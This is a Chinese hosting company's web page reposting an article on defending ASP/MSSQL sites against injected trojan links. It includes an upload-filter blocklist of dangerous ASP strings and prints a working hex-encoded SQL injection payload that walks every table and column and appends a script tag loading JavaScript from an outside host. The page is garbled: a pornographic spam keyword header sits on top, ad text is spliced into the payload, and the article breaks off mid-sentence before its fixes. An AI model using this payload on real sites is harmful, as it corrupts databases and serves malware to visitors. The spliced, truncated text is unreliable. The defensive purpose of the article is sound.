亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

防范MSSQL數據庫被掛馬方法

添加時間:2010-12-5  添加: admin 

 第一,網站存在上傳漏洞;雖然,上傳文件需要管理員身份驗證,也對上傳文件進行了文件格式的認證,但管理員身份驗證采用了cookies,而cookies是可以被偽造的,而且如果上傳了圖片后,不對該文件的內容采取任何判斷的話,那么圖片木馬也很有可能被上傳。
     flymorn的解決措施:1 刪除上傳文件功能(不太實際);2 修改上傳用戶驗證為session驗證;3 對上傳后的文件內容進行驗證,如果是圖片木馬,則刪除;可以參考以下的驗證代碼:
''===============判斷上傳文件是否含非法字符串start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '讀取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
   if instr(sTextAll,sNoString(i)) then
     set filedel = server.CreateObject("Scripting.FileSystemObject")
     filedel.deletefile Server.mappath(filePath)
     set filedel = nothing
     Response.Write("<script>alert('您上傳的文件有問題,上傳失!');history.back();</script>")
     Response.End
   end if
next
''=================判斷上傳文件是否含非法字符串end===================

     第二,網站存在cookies注入漏洞。由于程序設計中,為了考慮到減小服務器的開銷,所有用戶登陸后采用cookies驗證,這個cookies里保存了用戶的 ID 和 NAME ,而眾所周知,cookies是經常被黑客偽造的,這是其一;另外,某些外部參數 沒有采用嚴格的 request.form 和 request.querystring 來獲取內容,為了簡便,采用了 request("id") 這樣的方式。
      我們知道,ASP 的request 是先從form、querystring里獲取內容,如果這兩個為空,則要從cookies里獲取內容,大家往往在程序設計中考慮到了 request.form 和 request.querystring 的SQL注入,所以一般都會過濾 request.form 和 request.querystring進行sql注入;但卻偏偏忘了過濾cookies方式下的注入。我們來看下下面這樣的sql語句:
SQL="select * from 表名 where id="&request("id")
     如果這個 id 恰巧是通過cookies來獲取值的,那么想想,這是一件多么可怕的事。∽⑷胝呖梢暂p松的偽造一個名為 id 的虛假 cookies ,因為這個 id 的cookies 是服務器分配給客戶端的。這個cookies可以被偽造成類似下面這樣的一段代碼:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才網(http://it.ad0.cn) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--

      看暈了吧。這是利用HEX的方式進行SQL注入,可以繞過一般的IDS驗證,只要系統存在SQL注入,上面的代碼將會被執行,通過游標遍歷數據庫中的所有表和列并在列中插入js代碼。
      飄易采取的解決辦法:1 嚴格過濾 request.f

分享到:

頂部 】 【 關閉
版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站